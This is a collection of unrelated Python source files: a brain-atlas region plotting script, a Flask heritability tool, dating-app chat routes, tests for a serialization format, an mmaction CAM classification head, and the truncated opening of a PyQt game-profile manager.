        ccf = {}
        with open(ccf_txt, 'rU') as csvfile:
            csvreader = csv.reader(csvfile)
            for row in csvreader:
                # row[0] is ccf atlas index, row[4] is string of full name
                ccf[row[0]] = row[4];
                # print row[0]
                # print row[4]
                # print ', '.join(row)

        """Save counts for each region into a separate CSV"""
        unique = [];
        for l in thedata:
            unique.append(l[3])

        uniqueNP = np.asarray(unique)
        allUnique = np.unique(uniqueNP)
        numRegionsA = len(allUnique)

        # Store and count the number of regions in each unique region
        # NOTE(review): O(regions * points) scan; fine for small data.
        dictNumElementsRegion = {}
        for i in range(numRegionsA):
            counter = 0;
            for l in thedata:
                if l[3] == allUnique[i]:
                    counter = counter + 1;
            dictNumElementsRegion[ccf[str(l[3])]] = counter;

        region_names = dictNumElementsRegion.keys()
        number_repetitions = dictNumElementsRegion.values()

        from itertools import izip
        with open('ARA_CCF2_ds_10XCounts.csv', 'wb') as write:
            writer = csv.writer(write)
            writer.writerows(izip(region_names, number_repetitions))

        # Group the (x, y, z, region) rows by region name, preserving first-seen order.
        region_dict = OrderedDict()

        for l in thedata:
            trace = ccf[str(l[3])]
            # trace = 'trace' + str(l[3])
            if trace not in region_dict:
                region_dict[trace] = np.array([[l[0], l[1], l[2], l[3]]])
                # print 'yay'
            else:
                tmp = np.array([[l[0], l[1], l[2], l[3]]])
                region_dict[trace] = np.concatenate((region_dict.get(trace, np.zeros((1, 4))), tmp), axis=0)
                # print 'nay'

        # One distinct color per region (up to numRegions).
        current_palette = sns.color_palette("husl", numRegions)
        # print current_palette

        data = []
        for i, key in enumerate(region_dict):
            trace = region_dict[key]
            tmp_col = current_palette[i]
            tmp_col_lit = 'rgb' + str(tmp_col)
            temp = str(np.unique(trace[:, 3])).replace("[", "")
            final = temp.replace("]", "")
            # Scale voxel coordinates by the per-axis resolution for plotting.
            trace_scatter = Scatter3d(
                x=[x * xResolution for x in trace[:, 0]],
                y=[x * yResolution for x in trace[:, 1]],
                z=[x * zResolution for x in trace[:, 2]],
                mode='markers',
                name=ccf[final],
                marker=dict(
                    size=1.2,
                    color=tmp_col_lit,  # 'purple', # set color to an array/list of desired values
                    colorscale='Viridis',  # choose a colorscale
                    opacity=0.15
                )
            )
            data.append(trace_scatter)

        # Black background, no margins.
        layout = Layout(
            margin=dict(
                l=0,
                r=0,
                b=0,
                t=0
            ),
            paper_bgcolor='rgb(0,0,0)',
            plot_bgcolor='rgb(0,0,0)'
        )

        fig = Figure(data=data, layout=layout)
        plotly.offline.plot(fig, filename= self._path + '/' + self._token + "_region_pointcloud.html")
|
<filename>base/views/tools/heritability.py
import io
import requests
import statistics as st
import numpy as np
import pandas as pd
from base.utils.data_utils import hash_it
from base.utils.gcloud import check_blob, upload_file
from base.config import config
from base.forms import heritability_form
from flask import (request,
jsonify,
render_template,
Blueprint,
abort)
from logzero import logger
from datetime import datetime
from threading import Thread
# ================== #
# heritability #
# ================== #
# Tools blueprint
# Flask blueprint for the heritability tool; templates resolve from 'tools/'.
heritability_bp = Blueprint('heritability',
                            __name__,
                            template_folder='tools')
@heritability_bp.route('/heritability')
def heritability():
    """Renders the heritability calculator page with an empty form."""
    return render_template('tools/heritability_calculator.html',
                           title="Heritability Calculator",
                           form=heritability_form())
def h2_task(data, data_hash):
    """Background worker: POST the dataset to the heritability service.

    Designed to run in a daemon thread on the server so the submitting
    HTTP request can return immediately; the analysis itself executes on
    Google Cloud Run.
    """
    payload = {'data': data, 'hash': data_hash}
    response = requests.post(config['HERITABILITY_URL'], data=payload)
    logger.debug(response)
@heritability_bp.route('/heritability/submit', methods=["POST"])
def submit_h2():
    """
    Submit a heritability job.

    The heavy computation is handed off to a background daemon thread
    (h2_task) so this request can return to the client right away.
    """
    header = ["AssayNumber", "Strain", "TraitName", "Replicate", "Value"]
    # Skip the header row from the client and drop rows with no assay number.
    rows = [row for row in request.get_json()[1:] if row[0] is not None]
    data = pd.DataFrame(rows, columns=header).to_csv(index=False, sep="\t")
    # The report ID is a hash of the data itself, so identical submissions
    # resolve to the same report.
    data_hash = hash_it(data, length=32)
    logger.debug(data_hash)
    # Persist the raw input immediately so the results page can find it.
    data_blob = f"reports/heritability/{data_hash}/data.tsv"
    upload_file(data_blob, data, as_string=True)
    worker = Thread(target=h2_task, args=(data, data_hash,))
    worker.daemon = True
    worker.start()
    return jsonify({'thread_name': str(worker.name),
                    'started': True,
                    'data_hash': data_hash})
@heritability_bp.route('/heritability', methods=["POST"])
def check_data():
    """
    Summarize the pasted dataset before submission.

    Reports, via an AJAX request shown at the bottom of the form:
        Minimum, Maximum, Quartiles (25/50/75), Variance, SD.

    Returns:
        dict: formatted summary statistics, or an ``{"error": ...}``
        payload when fewer than two numeric values are present.
    """
    data = request.get_json()
    # Skip the client-side header row; drop rows with no assay number.
    data = [x for x in data[1:] if x[0] is not None]
    header = ["AssayNumber", "Strain", "TraitName", "Replicate", "Value"]
    data = pd.DataFrame(data, columns=header)
    # filter missing
    data = data[data.Value.apply(lambda x: x not in [None, "", "NA"])]
    # Convert to list
    data = data.Value.astype(float).tolist()
    # statistics.variance/stdev require >= 2 points and min/max require >= 1;
    # return an explicit error payload instead of crashing with a 500.
    if len(data) < 2:
        return {"error": "At least two numeric values are required."}
    result = {}
    result["variance"] = "{:.2f}".format(st.variance(data))
    result["sd"] = "{:.2f}".format(st.stdev(data))
    result["minimum"] = "{:.2f}".format(min(data))
    result["maximum"] = "{:.2f}".format(max(data))
    # Calculate quartiles
    All_quartiles = np.percentile(data, [25, 50, 75])
    result["25"] = "{:.2f}".format(All_quartiles[0])
    result["50"] = "{:.2f}".format(All_quartiles[1])
    result["75"] = "{:.2f}".format(All_quartiles[2])
    return result
@heritability_bp.route("/heritability/h2/<data_hash>")
def heritability_result(data_hash):
    # Render the results page for a previously submitted job; `data_hash`
    # is the content hash generated at submission time.
    title = "Heritability Results"
    data = check_blob(f"reports/heritability/{data_hash}/data.tsv")
    result = check_blob(f"reports/heritability/{data_hash}/result.tsv")
    ready = False
    if data is None:
        return abort(404, description="Heritability report not found")
    data = data.download_as_string().decode('utf-8')
    data = pd.read_csv(io.StringIO(data), sep="\t")
    data['AssayNumber'] = data['AssayNumber'].astype(str)
    data['label'] = data.apply(lambda x: f"{x['AssayNumber']}: {x['Value']}", 1)
    data = data.to_dict('records')
    trait = data[0]['TraitName']
    # Get trait and set title
    title = f"Heritability Results: {trait}"
    # result.tsv exists only once the background job has finished.
    if result:
        result = result.download_as_string().decode('utf-8')
        result = pd.read_csv(io.StringIO(result), sep="\t")
        result = result.to_dict('records')[0]
        fnam=datetime.today().strftime('%Y%m%d.')+trait
        ready = True
    # NOTE(review): the template receives every local (title, data, result,
    # trait, fnam, ready, ...) via **locals().
    return render_template("tools/heritability_results.html", **locals())
|
# app/chats/routes.py
from app import db, socketio
from app.chats import chats
from app.chats.models import Chat
from app.auth.models import User
from app.likes.models import Like
from app.blocks.models import Block
from app.notifications.models import Notification
from flask import render_template, redirect, url_for, session, flash, request, jsonify
from flask_socketio import SocketIO, send, emit
from sqlalchemy.orm import aliased
from datetime import datetime
from werkzeug.wrappers import Response
# In-memory map of user_id -> socket session id, used to route private
# messages to the recipient's open connection. Entries are lost on restart
# and are not removed on disconnect.
users = {}
@socketio.on('register_user')
def register_user():
    # Remember which socket belongs to the logged-in user.
    users[session['user_id']] = request.sid
@socketio.on('private_message', namespace='/private')
def private_message(payload):
    # Deliver a private chat message: the pair must mutually "like" each
    # other and neither may have blocked the other before the message is
    # saved and pushed to the recipient's socket (if connected).
    message = payload['message']
    # verify recipient can receive message from sender by checking blocks and likes
    parent = aliased(Like, name="parent")
    child = aliased(Like, name="child")
    # Single query: outer-join Block in either direction and require no
    # match, then require a Like in both directions (parent/child aliases).
    can_message = db.session.query(User.id) \
        .outerjoin(Block, \
            ((session['user_id'] == Block.blocked_id) & \
            (payload['user_id'] == Block.blocked_by_id)) | \
            ((session['user_id'] == Block.blocked_by_id) & \
            (payload['user_id'] == Block.blocked_id))) \
        .filter(Block.blocked_id == None, User.id == payload['user_id']) \
        .join(parent, ((session['user_id'] == parent.liked_id) & (payload['user_id'] == parent.liked_by_id))) \
        .filter(session['user_id'] == parent.liked_id) \
        .join(child, \
            (child.liked_id == parent.liked_by_id) & \
            (child.liked_by_id == parent.liked_id)) \
        .first()
    if can_message and can_message[0] == int(payload['user_id']):
        Chat.save_message(sent_by_id=session['user_id'],
                          received_by_id=payload['user_id'],
                          message=message,
                          message_time=payload['timestamp'])
        # Create (or refresh) the "new message" notification (event_id 5).
        notification = Notification.query.filter_by(owner_id = payload['user_id'], sent_by_id = payload['sender'], event_id = 5).first()
        if not notification:
            Notification.create_notification(payload['user_id'], payload['sender'], 5, datetime.now())
        else:
            notification.update_notification()
        # Push live only when the recipient has a registered socket.
        if users.get(payload['user_id']):
            recipient_session_id = users[payload['user_id']]
            emit('new_private_message', payload, room=recipient_session_id)
@chats.route('/chats', methods=['GET'])
def display_chats():
    # List up to 20 users the current user can chat with: mutual likes
    # (parent/child aliases) with no block in either direction.
    referral_id = request.args.get('referral_id', None)
    parent = aliased(Like, name="parent")
    child = aliased(Like, name="child")
    chat_users = db.session.query(User, Block, parent, child) \
        .join(parent, ((parent.liked_id == User.id) & (parent.liked_by_id == session['user_id']))) \
        .filter(parent.liked_by_id == session['user_id']) \
        .outerjoin(Block, ((Block.blocked_id == User.id) & (Block.blocked_by_id == session['user_id'])) | \
            ((Block.blocked_by_id == User.id) & (Block.blocked_id == session['user_id']))) \
        .filter(Block.blocked_id == None) \
        .join(child, \
            (child.liked_id == parent.liked_by_id) & \
            (parent.liked_id == child.liked_by_id)) \
        .limit(20) \
        .all()
    return render_template('chats.html', chat_users=chat_users, referral_id=referral_id, chat_notif=True)
@chats.route('/history', methods=['POST'])
def get_chat_history():
    """Return up to 100 recent messages between the current user and
    ``recipient_id``, newest first (the front end reverses them).

    Access requires mutual likes and no block in either direction; any
    failure (bad payload, DB error, permission) yields the literal string
    "error", which the front end treats as a failure sentinel.
    """
    try:
        recipient_id = request.json['recipient_id']
        # Accept ints or purely numeric strings only.
        if not isinstance(recipient_id, int) and recipient_id.isdigit() is False:
            return "error"
        parent = aliased(Like, name="parent")
        child = aliased(Like, name="child")
        # Validate the recipient_id isn't blocked or blocking current_user and that both users liked each other
        messages = db.session.query(Chat.sent_by_id, Chat.message, Chat.message_time) \
            .join(parent, ((session['user_id'] == parent.liked_id) & (recipient_id == parent.liked_by_id))) \
            .filter(session['user_id'] == parent.liked_id) \
            .join(child, \
                (child.liked_id == parent.liked_by_id) & \
                (child.liked_by_id == parent.liked_id)) \
            .outerjoin(Block, \
                ((session['user_id'] == Block.blocked_id) & \
                (recipient_id == Block.blocked_by_id)) | \
                ((session['user_id'] == Block.blocked_by_id) & \
                (recipient_id == Block.blocked_id))) \
            .filter(Block.blocked_id == None, ((Chat.sent_by_id==recipient_id) & (Chat.received_by_id==session['user_id'])) |\
                ((Chat.received_by_id==recipient_id) & (Chat.sent_by_id==session['user_id']))) \
            .order_by(Chat.id.desc()) \
            .limit(100) \
            .all()
        # need to reverse messages on front end
        return jsonify(messages=messages)
    except Exception:
        # Best-effort endpoint: malformed payloads and DB errors all map to
        # "error" rather than a 500. Narrowed from a bare `except:` so
        # SystemExit/KeyboardInterrupt are no longer swallowed.
        return "error"
@chats.errorhandler(429)
def ratelimit_handler(error):
    # Rendered when the client exceeds the rate limit configured elsewhere.
    return render_template('429.html'), 429
<gh_stars>1-10
import io
import unittest
from pprint import pprint as pp
from zoa import *
def assert_roundtrip(v):
  """Serialize `v` through ZoaRaw and assert it deserializes unchanged."""
  serialized = ZoaRaw.from_bytes(v).serialize()
  decoded = from_zoab(serialized)
  pp(decoded.arr)
  print()
  result = decoded.to_py()
  pp(v)
  pp(result)
  print(f'len: {len(v)} == {len(result)}')
  assert v == result
class TestZoaRaw(unittest.TestCase):
  # Exercises the low-level ZoaRaw wire format: length-prefixed data
  # segments, arrays, and the 63-byte JOIN segmentation for long data.
  def test_write_str(self):
    b = io.BytesIO()
    write_data(b, b'hi')
    b = b.getvalue()
    # First byte is the data length, then the payload.
    assert b[0] == 2
    assert b[1:] == b'hi'
  def test_write_arr_str(self):
    bw = io.BytesIO()
    v = [ZoaRaw.new_data(b'hi')]
    assert v[0].data == b'hi'
    write_arr(bw, v)
    b = bw.getvalue()
    print(b)
    # Array header encodes element count in the low bits.
    assert b[0] == ZOA_ARR | 1
    assert b[1] == 2 # the string
    assert b[2:] == b'hi'
  def test_from_arr_str(self):
    v = from_zoab(io.BytesIO(b'\x02hi'))
    assert v == ZoaRaw.new_data(b'hi')
  def test_from_to(self):
    # Round-trip nested lists of bytes through serialize/deserialize.
    assert_roundtrip([])
    assert_roundtrip([b'hi', b'bob'])
    assert_roundtrip([ [] ])
    assert_roundtrip([b'hi', [] ])
    assert_roundtrip([b'hi', [b'bob']])
  def test_long_bytes(self):
    bw = io.BytesIO()
    b = b'0123456789' * 13 # length = 130 (63 + 63 + 4
    write_data(bw, b)
    r = bw.getvalue()
    print(f"\n{hex(r[0])} == {hex(ZOA_DATA | ZOA_JOIN | 63)}\n")
    # Data longer than 63 bytes is emitted as JOIN segments of 63 bytes
    # followed by a final plain segment carrying the remainder.
    assert r[0] == ZOA_DATA | ZOA_JOIN | 63
    assert r[1:64] == b[0:63]
    assert r[64] == ZOA_DATA | ZOA_JOIN | 63
    assert r[65:128] == b[63:126]
    assert r[128] == ZOA_DATA | 4
    assert r[129:] == b[126:]
  def test_long_round(self):
    a = [ b'one', b'two', b'three', b'four', b'five' ] * 30 # 150
    assert_roundtrip(a)
class TestBase(unittest.TestCase):
  # Shared fixture: each test method gets a fresh type environment.
  def setUp(self):
    self.env = TyEnv()
class TestZoaTy(TestBase):
  # Exercises the typed layer on top of ZoaRaw: Int, Bytes, arrays,
  # structs, enums and bitmaps, each round-tripped via toZ()/frZ().
  def test_int(self):
    # Non-negative ints serialize as bare data; negatives as a 1-element
    # array wrapping the magnitude.
    assert b'\x42' == Int(0x42).toZ().data
    assert 0x42 == Int.frZ(ZoaRaw.new_data(b'\x42'))
    z = Int(-0x42).toZ()
    assert len(z.arr) == 1
    assert b'\x42' == z.arr[0].data
    assert -0x42 == Int.frZ(ZoaRaw.new_arr([ZoaRaw.new_data(b'\x42')]))
  def test_arr_int(self):
    ArrInt = self.env.arr(Int)
    ai = ArrInt.frPy(range(10))
    z = ai.toZ()
    assert b'\x00' == z.arr[0].data
    assert b'\x09' == z.arr[9].data
    assert ai == ArrInt.frZ(z)
  def test_bytes(self):
    b = Bytes(b'abc 123')
    assert b'abc 123' == b.toZ().data
    assert b == Bytes.frZ(ZoaRaw.new_data(b'abc 123'))
  def test_struct(self):
    ty = self.env.struct(None, b'foo', [
      (b'a', StructField(Int)),
    ])
    # Serialized struct: positional-count followed by field values.
    z = ZoaRaw.new_arr([
      Int(1).toZ(),  # numPositional
      Int(0x77).toZ(), # value of 'a'
    ])
    s = ty.frZ(z)
    assert s.a == 0x77
    assert z == s.toZ()
  def test_enum(self):
    ty = self.env.enum(None, b'en', [
      (b'a', Int),
      (b'b', Bytes),
    ])
    # Exactly one variant is set; the other reads as None.
    en = ty(a=Int(3))
    assert en.b is None; assert 3 == en.a
    assert en.toZ() == ZoaRaw.new_arr([Int(0).toZ(), Int(3).toZ()])
    en = ty(b=Bytes(b'hi there enum'))
    assert en.a is None; assert en.b == b'hi there enum'
    assert en.toZ() == ZoaRaw.new_arr([
      Int(1).toZ(), Bytes(b'hi there enum').toZ()])
    assert ty.frZ(en.toZ()) == en
  def test_bitmap(self):
    ty = self.env.bitmap(None, b'bm', [
      (b'a', BmVar(0x01, 0x03)),
      (b'b', BmVar(0x03, 0x03)),
      (b'noTop', BmVar(0x00, 0x10)),
      (b'top', BmVar(0x10, 0x10)),
    ])
    # Each variant sets its value within its mask; getters/predicates are
    # generated per variant (set_a/get_a/is_a, ...).
    bm = ty(); assert 0 == bm.value
    bm.set_top(); assert 0x10 == bm.value
    bm.set_noTop(); assert 0x00 == bm.value
    bm.set_a(); assert 0x01 == bm.value
    assert 0x01 == bm.get_a()
    bm.set_b(); assert 0x03 == bm.value
    assert 0x03 == bm.get_a()
    bm.set_a(); assert 0x01 == bm.value
    bm.set_top(); assert 0x11 == bm.value
    assert bm.is_a()
    assert not bm.is_b()
    assert bm.is_top()
    bm.set_a(0x03); assert bm.is_b(); assert 0x13 == bm.value
    assert bm.toZ() == ZoaRaw.new_data(b'\x13')
    assert bm.frZ(bm.toZ()) == bm
def tokens(buf):
  """Tokenize `buf` with Parser, returning tokens decoded as utf-8."""
  parser = Parser(buf)
  result = []
  while parser.i < len(buf):
    tok = parser.token()
    if not tok:
      break
    result.append(tok.decode('utf-8'))
  return result
class TestParse(TestBase):
  # Exercises the zoa text parser: character classes, whitespace/comment
  # skipping, tokenization, and type declarations (struct/enum/bitmap).
  def test_TG(self):
    # Character classification used by the tokenizer.
    assert TG.fromChr(ord(' ')) is TG.T_WHITE
    assert TG.fromChr(ord('\n')) is TG.T_WHITE
    assert TG.fromChr(ord('_')) is TG.T_NUM
    assert TG.fromChr(ord('f')) is TG.T_HEX
    assert TG.fromChr(ord('g')) is TG.T_ALPHA
    assert TG.fromChr(ord('.')) is TG.T_ALPHA
  def test_skipWhitespace(self):
    p = Parser(b' \nfoo')
    assert p.i == 0
    p.skipWhitespace(); assert p.i == 4
    p.skipWhitespace(); assert p.i == 4
  def test_comment(self):
    # Line comments, inline comments and parenthesized comments all parse.
    Parser(b'\\ hi there\n \\hi \\there\n \\(hi there) \\bob').parse()
  def test_single(self):
    assert b']' == Parser(b']').token()
    assert b')' == Parser(b')').token()
    assert b'a' == Parser(b'a').token()
  def test_tokens(self):
    assert tokens(b'a_b[foo.bar baz]') == [
      'a_b', '[', 'foo.bar', 'baz', ']']
  def test_struct(self):
    p = Parser(b'struct foo [a: Int]')
    p.parse()
    foo = p.env.tys[b'foo']
    assert foo._fields == [(b'a', StructField(Int))]
    p = Parser(b'struct Ab [a: Int; b: Bytes]')
    p.parse()
    Ab = p.env.tys[b'Ab']
    assert Ab._fields == [
      (b'a', StructField(Int)),
      (b'b', StructField(Bytes)),
    ]
    # Parsed struct types are directly constructible.
    ab = Ab(a = 1, b = b'hi')
    assert ab.a == 1
    assert ab.b == b'hi'
  def test_struct_inner(self):
    # A struct may reference a previously declared struct as a field type.
    p = Parser(b'struct Foo [a: Int]\nstruct Bar[a: Int; f: Foo]')
    p.parse()
    Foo = p.env.tys[b'Foo']
    Bar = p.env.tys[b'Bar']
    assert Bar._fields == [
      (b'a', StructField(Int)),
      (b'f', StructField(Foo)),
    ]
  def test_enum(self):
    p = Parser(b'enum E \\comment [a: Int; b: Bytes]')
    p.parse()
    E = p.env.tys[b'E']
    assert E._variants == [
      (b'a', Int),
      (b'b', Bytes),
    ]
  def test_bitmap(self):
    p = Parser(b'bitmap B [a 0x01 0x03; b 0x02 0x07]')
    p.parse()
    B = p.env.tys[b'B']
    assert B._variants == [
      (b'a', BmVar(1, 3)),
      (b'b', BmVar(2, 7)),
    ]
# Run the full test suite when executed as a script.
if __name__ == '__main__':
  unittest.main()
|
<filename>mmaction/models/heads/cam_head.py<gh_stars>0
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import normal_init, kaiming_init
from ..builder import HEADS
from .base import BaseHead
from ...core import top_k_accuracy
import math
def obj_loc(score, threshold):
    # Locate the most salient contiguous interval along a 1-D activation
    # profile `score` (torch tensor of length sdim). Intervals are delimited
    # by sign changes of (score - threshold); the winner is the interval
    # with the highest peak (ties broken by length), then padded up to a
    # minimum width. Returns (zmin, zmax) index bounds.
    smax, sdis, sdim = 0, 0, score.size(0)
    minsize = int(math.ceil(sdim * 0.125)) #0.125
    # minsize = 1
    # Sign of score relative to threshold; |diff| == 2 marks a crossing.
    snorm = (score - threshold).sign()
    snormdiff = (snorm[1:] - snorm[:-1]).abs()
    szero = (snormdiff==2).nonzero()
    if len(szero)==0:
        # No crossings at all: fall back to the central 75% of the axis.
        zmin, zmax = int(math.ceil(sdim*0.125)), int(math.ceil(sdim*0.875))
        return zmin, zmax
    # Candidate: segment before the first crossing.
    if szero[0] > 0:
        lzmin, lzmax = 0, szero[0].item()
        lzdis = lzmax - lzmin
        lsmax, _ = score[lzmin:lzmax].max(0)
        if lsmax > smax:
            smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
        if lsmax == smax:
            if lzdis > sdis:
                smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
    # Candidate: segment after the last crossing. NOTE(review): crossing
    # indices are always < sdim, so this branch always runs and guarantees
    # zmin/zmax are initialized before use below.
    if szero[-1] < sdim:
        lzmin, lzmax = szero[-1].item(), sdim
        lzdis = lzmax - lzmin
        lsmax, _ = score[lzmin:lzmax].max(0)
        if lsmax > smax:
            smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
        if lsmax == smax:
            if lzdis > sdis:
                smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
    # Candidates: segments between consecutive crossings.
    if len(szero) >= 2:
        for i in range(len(szero)-1):
            lzmin, lzmax = szero[i].item(), szero[i+1].item()
            lzdis = lzmax - lzmin
            lsmax, _ = score[lzmin:lzmax].max(0)
            if lsmax > smax:
                smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
            if lsmax == smax:
                if lzdis > sdis:
                    smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
    # Pad the chosen interval symmetrically up to `minsize`, clamping at
    # the axis boundaries.
    if zmax - zmin <= minsize:
        pad = minsize-(zmax-zmin)
        if zmin > int(math.ceil(pad/2.0)) and sdim - zmax > pad:
            zmin = zmin - int(math.ceil(pad/2.0)) + 1
            zmax = zmax + int(math.ceil(pad/2.0))
        if zmin < int(math.ceil(pad/2.0)):
            zmin = 0
            zmax = minsize
        if sdim - zmax < int(math.ceil(pad/2.0)):
            zmin = sdim - minsize + 1
            zmax = sdim
    # Guarantee a non-empty interval.
    if zmax - zmin < 1:
        if sdim-zmax>=1:
            zmax = zmax+1
        else:
            zmin = zmin-1
    return zmin, zmax
@HEADS.register_module()
class CAMHead(BaseHead):
    """Classification head for I3D.
    Args:
        num_classes (int): Number of classes to be classified.
        in_channels (int): Number of channels in input feature.
        loss_cls (dict): Config for building loss.
            Default: dict(type='CrossEntropyLoss')
        spatial_type (str): Pooling type in spatial dimension. Default: 'avg'.
        dropout_ratio (float): Probability of dropout layer. Default: 0.5.
        topN (int): Number of top-scoring class activation regions to crop
            and re-classify per sample. Default: 6.
        vis (bool): If True, forward() also returns the region bounding
            boxes for visualization. Default: False.
        threshold (float): Threshold passed to obj_loc for region
            localization. Default: 0.5.
        kwargs (dict, optional): Any keyword argument to be used to initialize
            the head.
    """
    def __init__(self,
                 num_classes,
                 in_channels,
                 loss_cls=dict(type='CrossEntropyLoss'),
                 spatial_type='avg',
                 dropout_ratio=0.5,
                 topN=6,
                 vis=False,
                 threshold=0.5,
                 # init_std=0.01,
                 **kwargs):
        super().__init__(num_classes, in_channels, loss_cls, **kwargs)
        self.spatial_type = spatial_type
        self.dropout_ratio = dropout_ratio
        self.topN = topN
        self.vis = vis
        self.threshold = threshold
        if self.dropout_ratio != 0:
            self.dropout = nn.Dropout(p=self.dropout_ratio)
        else:
            self.dropout = None
        # Global classifier (also reused as the CAM scorer in forward()).
        self.fc_cls = nn.Conv3d(self.in_channels, self.num_classes, 1, bias = True)
        # Local classifier applied to pooled features of cropped regions.
        self.fc_local = nn.Sequential(
            nn.Conv3d(self.in_channels, 4 * self.in_channels, 1, bias = True),
            nn.ReLU(),
            nn.Dropout(0.1),
            nn.Conv3d(4 * self.in_channels, self.num_classes, 1, bias = True),
        )
        if self.spatial_type == 'avg':
            # use `nn.AdaptiveAvgPool3d` to adaptively match the in_channels.
            self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
        else:
            self.avg_pool = None
    def init_weights(self):
        """Initiate the parameters from scratch."""
        kaiming_init(self.fc_cls)
    def forward(self, x):
        """Defines the computation performed at every call.
        Args:
            x (torch.Tensor): The input data.
        Returns:
            torch.Tensor: The classification scores for input samples.
        """
        # NOTE(review): here `d` is the channel axis (in_channels) and
        # t/h/w are the temporal/spatial extents — confirm against caller.
        b, d, t, h, w = x.shape
        # [N, in_channels, 4, 7, 7]
        gf = self.avg_pool(x)
        # [N, in_channels, 1, 1, 1]
        if self.dropout is not None:
            gf = self.dropout(gf)
        # [N, in_channels, 1, 1, 1]
        gs = self.fc_cls(gf)
        # [N, num_classes, 1, 1, 1]
        gs = torch.sigmoid(gs)
        gs = gs.view(x.shape[0], -1)
        # [N, num_classes]
        # CAM scores over the full feature map; detached so region
        # selection does not backprop into the backbone.
        camscore = self.fc_cls(x.detach())
        camscore = torch.sigmoid(camscore)
        # Collapse the CAM to 1-D profiles along each axis (w, h, t).
        wscore = F.adaptive_max_pool3d(camscore, (1, 1, None)).squeeze(dim=2).squeeze(dim=2)
        hscore = F.adaptive_max_pool3d(camscore, (1, None, 1)).squeeze(dim=4).squeeze(dim=2)
        tscore = F.adaptive_max_pool3d(camscore, (None, 1, 1)).squeeze(dim=3).squeeze(dim=3)
        # print(wscore.shape, hscore.shape, tscore.shape)
        proposals = torch.zeros([b, self.topN, d, t, h, w]).cuda()
        if self.vis == True:
            region_bboxs = torch.FloatTensor(b, self.topN, 8)
        for i in range(b):
            # Take the topN highest-scoring classes for this sample.
            gs_inv, gs_ind = gs[i].sort(descending=True)
            for j in range(self.topN):
                xs = wscore[i,gs_ind[j],:].squeeze()
                ys = hscore[i,gs_ind[j],:].squeeze()
                ts = tscore[i,gs_ind[j],:].squeeze()
                # Min-max normalize each profile (guarding constant profiles).
                if xs.max() == xs.min():
                    xs = xs/xs.max()
                else:
                    xs = (xs-xs.min())/(xs.max()-xs.min())
                if ys.max() == ys.min():
                    ys = ys/ys.max()
                else:
                    ys = (ys-ys.min())/(ys.max()-ys.min())
                if ts.max() == ts.min():
                    ts = ts/ts.max()
                else:
                    ts = (ts-ts.min())/(ts.max()-ts.min())
                # Localize the salient interval on each axis, then crop and
                # resize the region back to the full (t, h, w) extent.
                x1, x2 = obj_loc(xs, self.threshold)
                y1, y2 = obj_loc(ys, self.threshold)
                t1, t2 = obj_loc(ts, self.threshold)
                # print(x.shape, x1, x2, y1, y2, t1, t2)
                proposals[i:i+1, j ] = F.interpolate(x[i:i+1, :, t1:t2, y1:y2, x1:x2], size=(t, h, w), mode='trilinear', align_corners=True)
                if self.vis == True:
                    region_bboxs[i,j] = torch.Tensor([t1, t2, x1, x2, y1, y2, gs_ind[j].item(), gs[i, gs_ind[j]].item()])
        # Classify each cropped region and max-pool scores over regions.
        proposals = proposals.view(b*self.topN, d, t, h, w)
        lf = F.adaptive_max_pool3d(proposals, (1,1,1))
        lf = self.fc_local(lf)
        ls = torch.sigmoid(lf)
        ls = F.adaptive_max_pool2d(ls.reshape(b, self.topN, self.num_classes, 1).permute(0, 3, 1, 2), (1, self.num_classes))
        ls = ls.view(ls.size(0), -1)
        if self.vis == True:
            return gs, ls, region_bboxs
        else:
            # print(gs.shape, ls.shape)
            return gs, ls
        # return cls_score
    def loss(self, cls_score, labels, **kwargs):
        """Calculate the loss given output ``cls_score``, target ``labels``.
        Args:
            cls_score (torch.Tensor): The output of the model.
            labels (torch.Tensor): The target output of the model.
        Returns:
            dict: A dict containing field 'loss_cls'(mandatory)
            and 'top1_acc', 'top5_acc'(optional).
        """
        losses = dict()
        loss = dict()
        # forward() returns (global_scores, local_scores) as a tuple.
        if isinstance(cls_score, tuple):
            gs, ls = cls_score
        if labels.shape == torch.Size([]):
            labels = labels.unsqueeze(0)
        elif labels.dim() == 1 and labels.size()[0] == self.num_classes:
            # Fix a bug when training with soft labels and batch size is 1.
            # When using soft labels, `labels` and `cls_socre` share the same
            # shape.
            if (isinstance(cls_score, tuple) and cls_score[0].size()[0] == 1) or cls_score.size()[0] == 1 :
                labels = labels.unsqueeze(0)
        elif self.multi_class and self.label_smooth_eps != 0:
            labels = ((1 - self.label_smooth_eps) * labels + self.label_smooth_eps / self.num_classes)
        if self.multi_class and cls_score is not None:
            # Only use the cls_score
            if isinstance(cls_score, tuple):
                # Separate losses for global and local branches; metrics are
                # computed on their average.
                loss['g_loss'] = self.loss_cls(gs, labels, **kwargs)
                loss['l_loss'] = self.loss_cls(ls, labels, **kwargs)
                cls_score = (gs + ls) / 2.
            else:
                loss['loss_cls'] = self.loss_cls(cls_score, labels, **kwargs)
            recall_thr, prec_thr, recall_k, prec_k = self.multi_label_accuracy(
                cls_score, labels, thr=0.5)
            losses['recall@thr=0.5'] = recall_thr
            losses['prec@thr=0.5'] = prec_thr
            for i, k in enumerate(self.topk):
                losses[f'recall@top{k}'] = recall_k[i]
                losses[f'prec@top{k}'] = prec_k[i]
        # loss_cls may be dictionary or single tensor
        if isinstance(loss, dict):
            losses.update(loss)
        else:
            losses['loss_cls'] = loss
        return losses
|
<gh_stars>0
from Qt.gui import Ui_MainWindow
from PyQt5.QtWidgets import QMainWindow, QHeaderView, QTableWidgetItem, QShortcut, QListWidget, QTableView
from PyQt5.QtCore import QAbstractItemModel, Qt, QModelIndex, QVariant, QThread, QEvent, pyqtSignal, QAbstractTableModel, QSortFilterProxyModel
from PyQt5.QtGui import QKeySequence, QIcon
from shutil import copyfile
import core
import subprocess
import psutil
import fileinput
# Module-level state shared by the UI: the profile store and the list of
# games shown in the main list widget.
profile_manager = core.ProfileManager()
games = []
class MainWindow(QMainWindow):
    # Main application window: manages profiles of games, searches Steamdb
    # in a background thread, and generates/launches the GreenLuma (GLR)
    # AppList via DLLInjector.
    def __init__(self):
        super(MainWindow,self).__init__()
